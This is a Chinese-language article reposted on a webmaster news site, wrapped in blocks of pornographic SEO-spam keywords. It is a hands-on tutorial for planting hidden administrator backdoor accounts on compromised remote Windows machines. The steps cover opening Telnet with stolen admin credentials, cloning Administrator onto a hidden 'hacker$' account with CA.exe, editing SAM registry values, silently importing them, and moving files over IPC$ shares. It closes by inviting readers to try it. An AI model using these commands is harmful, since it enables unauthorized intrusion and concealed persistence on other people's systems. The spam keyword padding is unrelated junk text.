亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 入侵防御 查看內容

克隆賬戶隱藏超級用戶創建全接觸

2022-9-26 13:03| 查看: 2600 |來源: 互聯網

 一、利用帳戶克隆工具來創建  Clone Administrator(CA.exe),利用這個工具可以將Administrator的帳號克隆為一個指定的普通帳號(此普通帳號必須已經存在)。克隆得到的帳號具有和系統內置的Administrator同樣
 一、利用帳戶克隆工具來創建
  Clone Administrator(CA.exe),利用這個工具可以將Administrator的帳號克隆為一個指定的普通帳號(此普通帳號必須已經存在)。克隆得到的帳號具有和系統內置的Administrator同樣的設置,并且用NET命令或者用戶管理器也發現不了其權限已經被提升,是一個不錯的ROOT KIT。
  現在,我們就來看看如何利用帳戶克隆工具在肉雞上創建隱藏的超級用戶。
  
  利用流光、SuperScan等進行掃描,假設已經掃描到一遠程主機的Administrator帳戶,其密碼為123。我們可以使用DameWare Mini Remote Control(簡稱DMRC),在圖形界面(GUI)中來遠程控制遠程主機。也可以使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,其命令格式為:OpenTelnet.exe \\server username password NTLMAuthor telnetport,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,沒想這么成功容易就開啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶及密碼,成功獲取一SHELL。
  
 

  首先想辦法查看一下有哪些用戶被細心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會將guest禁用,當然也會禁用其他用戶。在圖形界面下,非常容易識別,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉。但在命令行狀態下,只能使用命令:“net user 用戶名”一個一個來查看用戶是否被禁用。如果懶得這樣麻煩,可自行建立一個新的帳戶,命令為:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”來停用此帳戶。
  
 

  斷開與遠程主機的連接,用小榕的超級用戶克隆程序CA.exe,將被禁用的用戶hacker$克隆成超級用戶,命令為:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!
  
 

  這時,hacker$就成為了超級用戶,并有具有和Administrator同樣的設置(桌面、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca \\192.XX.XX.2 administrator 123。
  
 

  看到這一行返回信息沒有?“[hacker$] AS SAME AS [Administrator]”,說明hacker$帳戶和Administrator相同,克隆成功。
  
  二、圖形界面建隱藏超級用戶
  恐怕我們最熟悉的就是在圖形界面下進行操作了,這對于在本地計算機、3389終端服務肉雞或使用DMRC等控制的肉雞上創建隱藏超級用戶 再好不過了。
  
  大家知道嗎?Windows 2000中有兩個注冊表編輯器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實為一個程序,修改鍵值的權限時在右鍵快捷菜單中選擇“權限”來修改。對Regedit.exe我想大家都很熟悉,但卻不能對注冊表的鍵進行權限設置,而Regedt32.exe最大的優點就是能夠對注冊表的項鍵設置權限。Windows NT/2000/XP的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統用戶SYSTEM外,其他用戶都沒有權限查看到其中的信息,因此首先得用Regedt32.exe對“HKEY_LOCAL_MACHINE\SAM\SAM”鍵設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進行讀寫操作。
  
  首先在肉雞中創建一個新的帳戶hacker$,可以在帳戶管理器中建立,也可以使用命令:net user hacker$ 123 /add 來創建。然后通過“開始”菜單中的“運行”,輸入regedt32.exe,點擊“確定”后就打開了注冊表編輯器。依次展開子鍵HKEY_LOCAL_MACHINE\SAM\SAM,用鼠標右鍵單擊,在彈出的快捷菜單中選擇“權限”項。
  
 

  在出現的“SAM 權限”對話窗口中,點擊“添加”將我登錄時的帳戶添加到“組或用戶名稱”列表中,這里我是以administrator的身份登錄的,所以我就將administrator加入,在下部的權限功能區設置權限為“完全控制”。
  
 

  小提示:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以后,再來這里將你添加的帳戶刪除即可。
  
  如果還是不能展開子鍵,請關閉后重新打開,如果是Windows 2000的機器,請關閉這個注冊表編輯器,重新打開“regedit.exe”。展開子鍵:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$,在其右側窗口中發現其默認值為0x3F1。
  
 

  下面將hacker$鍵、hacker$對應的項000003F1以及administrator所對應的項000001F4導出為hacker.reg、3EE.reg和1f4.reg,退出注冊表編輯器。用記事本分別打開這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項000003EE下的鍵“F”的值,然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來在命令行下執行net user hacker$ /del將用戶hacker$刪除,最后再將hacker.reg導入注冊表即可。
  
  現在,隱藏的超級用戶hacker$已經建好了。打開regedt32.exe,把HKEY_LOCAL_MACHINE\SAM\SAM鍵權限改回原來的樣子(只要刪除添加的帳戶administrator即可)。
  
  注意:隱藏的超級用戶建好后,就能在帳戶管理器看不到hacker$這個用戶,在命令行用“net user”命令也看不到,但是超級用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
  
  三、命令行建立隱藏超級用戶
  首先通過使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,然后TELNET遠程登陸得到一個shell,創建一個新的帳戶,命令為:
  net user hacker$ youkou /add,然后就來導出注冊表項HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users,運行命令:
  regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\,其中/e 是regedit.exe的參數,在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users這個鍵的一定要以“\”結尾。
  
 

  斷開TELNET連接,建立IPC會話:net use \\192.XX.XX.2\ipc$ "123" /user:"administrator,然后將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令為:copy \\192.XX.XX.2\D$\hacker.reg,用記事本編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項000003EE下的鍵“F”的值(hacker$對應的項在不同的機器而不同),編輯好后再上傳:copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg 。
  
  再TELNET到遠程主機,使用命令net user hacker$ /del刪除hacker$帳戶,然后把hacker.reg導入,命令為:regedit.exe /s hacker.reg,其中參數/s表示以安靜模式導入。這樣就成功創建了一個隱藏的超級用戶。
  
  四、連接遠程肉雞注冊表創建
  還有一個比較簡單方便的辦法,就是通過控制臺以及注冊表編輯器“文件”菜單中的“連接網絡注冊表”功能來完成隱藏超級用戶的創建。
  
  通過“開始”菜單中的“運行”,輸入MMC,回車后即打開了控制臺,打開“文件”菜單中的“添加/刪除管理單元”(快捷鍵CTRL+M),在出現的對話框中點擊“添加”按鈕,在出現的“添加獨立管理單元”對話框中的列表中選擇“本地用戶和組”。
  
 

  單擊“添加”即彈出“選擇目標機器”對話框,選中“另一臺計算機”,在其后輸入遠程計算機的IP地址,點擊“完成”。
  
 

  一路關閉返回至控制臺窗口,我們就可對遠程計算機進行組和用戶的管理了,在右側窗口空白處右擊,在彈出的快捷選擇“新用戶”建立一帳戶hacker$吧!
  
  我們知道,regedit.exe、regedt32.exe都有連接網絡注冊表的功能,我們可以用regedt32.exe來為遠程主機的注冊表項設置權限,用regedit.exe來編輯遠程注冊表。導出相應注冊項,然后進行編輯修改(同上面介紹相似)。
  

  現在在“控制臺”中刪除剛建立的帳戶hacker$,然后關閉。然后在注冊表編輯器中通過“文件”菜單中的“導入”功能將上面導出的文件導入即可。
  
  如果遠程主機沒有開啟遠程注冊表服務,請自行開啟,因為你一開始就已經擁有其管理員帳戶密碼。
  
  五、需注意的幾點事項
  1、隱藏的超級用戶建立以后,在帳戶管理器中和命令行下均看不到這個用戶,但這個用戶卻存在。
  2、隱藏的超級用戶建立以后,就不能再修改密碼了,因為一旦修改密碼,這個隱藏的超級用戶就會暴露在帳戶管理器中,而且不能刪除。
  
  3、如在本機上創建隱藏的超級用戶時,最好用系統自帶的備份工具先備份好注冊表。
  
  想不想在電腦上大顯身手?自己動手試一試吧!
本文最后更新于 2022-9-26 13:03,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        91精品国产综合久久精品| 亚洲国产精品人人做人人爽| 欧美一区二区啪啪| 精品视频一区二区三区免费| 色狠狠av一区二区三区| 不卡的看片网站| 成人性生交大片免费 | 久久精品男人的天堂| 精品久久久久久久人人人人传媒| 91精品国产一区二区三区香蕉| 欧美美女一区二区| 欧美一区二区三区公司| 日韩一区二区三| 日韩欧美不卡在线观看视频| 亚洲精品在线免费观看视频| 国产亚洲女人久久久久毛片| 国产精品每日更新在线播放网址| 亚洲欧洲成人自拍| 亚洲国产一区二区三区青草影视| 午夜欧美视频在线观看| 久久 天天综合| 成人性视频网站| 精品视频一区二区不卡| 日韩欧美视频一区| 国产欧美日本一区二区三区| 亚洲女与黑人做爰| 日本在线不卡视频一二三区| 国产资源在线一区| 99re视频精品| 欧美一区二区三区视频在线 | 日韩成人精品在线观看| 国产精品原创巨作av| 99国产精品久| 欧美一区二区免费视频| 日本一区二区三区电影| 三级久久三级久久| 激情五月婷婷综合网| 色播五月激情综合网| 26uuu久久天堂性欧美| 亚洲美女免费在线| 精品制服美女久久| 色狠狠一区二区三区香蕉| 欧美精品一区二区三区在线播放| 亚洲精品视频在线观看免费| 久久国产剧场电影| 欧美综合欧美视频| 欧美激情艳妇裸体舞| 偷窥国产亚洲免费视频| 99久久婷婷国产| 欧美va天堂va视频va在线| 亚洲地区一二三色| 不卡的av电影在线观看| 精品乱码亚洲一区二区不卡| 亚洲一区影音先锋| 成人h动漫精品一区二区| 日韩欧美在线网站| 午夜久久久久久久久久一区二区| 99视频精品在线| 国产欧美精品一区二区色综合 | 2024国产精品| 亚洲成人资源在线| 91日韩在线专区| 欧美国产一区在线| 国产综合色视频| 精品少妇一区二区三区在线播放 | 亚洲婷婷综合色高清在线| 国产一区二区三区在线看麻豆| 欧美疯狂做受xxxx富婆| 亚洲一区二区精品视频| 色94色欧美sute亚洲13| 亚洲丝袜另类动漫二区| 99久久婷婷国产综合精品| 中文字幕日韩av资源站| 成人高清免费观看| 中日韩av电影| 成人黄色免费短视频| 欧美国产一区二区| 播五月开心婷婷综合| 国产精品伦一区| 色综合天天在线| 亚洲精品日日夜夜| 欧美日韩一区二区三区四区| 午夜精品免费在线| 欧美一区中文字幕| 另类小说一区二区三区| 精品卡一卡二卡三卡四在线| 国产一区中文字幕| 亚洲国产高清在线观看视频| 国产精品一区二区在线观看不卡 | 久久久久久久久久美女| 粉嫩久久99精品久久久久久夜 | 欧美日韩视频专区在线播放| 天天影视网天天综合色在线播放| 4438x亚洲最大成人网| 久久99精品国产麻豆婷婷洗澡| 亚洲精品一区二区三区蜜桃下载| 成人性色生活片免费看爆迷你毛片| 国产精品女主播在线观看| 日本高清不卡aⅴ免费网站| 日韩专区一卡二卡| 久久久噜噜噜久久中文字幕色伊伊| 成人免费观看av| 亚洲福中文字幕伊人影院| 日韩欧美美女一区二区三区| 成人一道本在线| 午夜欧美一区二区三区在线播放| 久久久久久久综合狠狠综合| 91福利资源站| 国产在线不卡一区| 亚洲人快播电影网| 日韩午夜精品视频| 97se亚洲国产综合自在线| 水蜜桃久久夜色精品一区的特点| 国产午夜亚洲精品午夜鲁丝片| 欧美在线观看视频一区二区| 国产麻豆视频精品| 亚洲第四色夜色| 中文字幕在线播放不卡一区| 91精品国产综合久久久蜜臀图片| 成人综合婷婷国产精品久久 | 亚洲人妖av一区二区| 欧美va亚洲va在线观看蝴蝶网| 一本大道久久精品懂色aⅴ| 狠狠色综合色综合网络| 亚洲午夜免费视频| 中文字幕欧美日韩一区| 欧美成人一区二区三区片免费 | 国产日韩亚洲欧美综合| 91精品午夜视频| 色天天综合久久久久综合片| 国产一区二区三区免费在线观看 | 国产日韩v精品一区二区| 欧美美女一区二区| 色综合久久中文综合久久牛| 国产福利精品一区二区| 日本成人在线看| 一区二区三区欧美久久| 国产精品国产自产拍高清av王其| 精品欧美一区二区在线观看| 欧美久久久影院| 欧美性xxxxx极品少妇| 一本一道综合狠狠老| 成人app在线| 高清国产一区二区三区| 韩国成人精品a∨在线观看| 免费在线观看日韩欧美| 日日摸夜夜添夜夜添精品视频 | av色综合久久天堂av综合| 国产一区二区三区免费观看 | 亚洲资源中文字幕| 亚洲免费色视频| 亚洲美女视频一区| 亚洲欧美日韩国产一区二区三区| 国产精品免费网站在线观看| 欧美国产日韩在线观看| 国产精品人人做人人爽人人添| 国产欧美一区二区在线| 欧美激情综合在线| 国产精品午夜春色av| 中文字幕一区二区三| 日韩美女视频19| 亚洲国产一区二区三区| 一区av在线播放| 日韩一区欧美二区| 开心九九激情九九欧美日韩精美视频电影 | 狠狠狠色丁香婷婷综合激情| 国内精品伊人久久久久av一坑 | 91精选在线观看| 欧美sm极限捆绑bd| 久久久99免费| 中文字幕一区二| 亚洲国产cao| 久久99日本精品| 国产成人综合在线播放| 99在线精品视频| 欧美情侣在线播放| 精品国产1区2区3区| 中国色在线观看另类| 亚洲一级二级在线| 久久精品国产成人一区二区三区| 国产成人精品网址| 91性感美女视频| 日韩一区和二区| 亚洲欧洲性图库| 日本中文字幕一区| 成人aa视频在线观看| 欧美久久高跟鞋激| 中文字幕 久热精品 视频在线| 一区二区三区在线不卡| 久久99精品国产麻豆婷婷 | 国产高清久久久| 欧美影视一区在线| 久久综合给合久久狠狠狠97色69| 成人欧美一区二区三区在线播放| 首页欧美精品中文字幕| 成人三级伦理片| 日韩一卡二卡三卡| 一区二区三区在线免费观看| 国产精品一区二区免费不卡 | 91九色最新地址|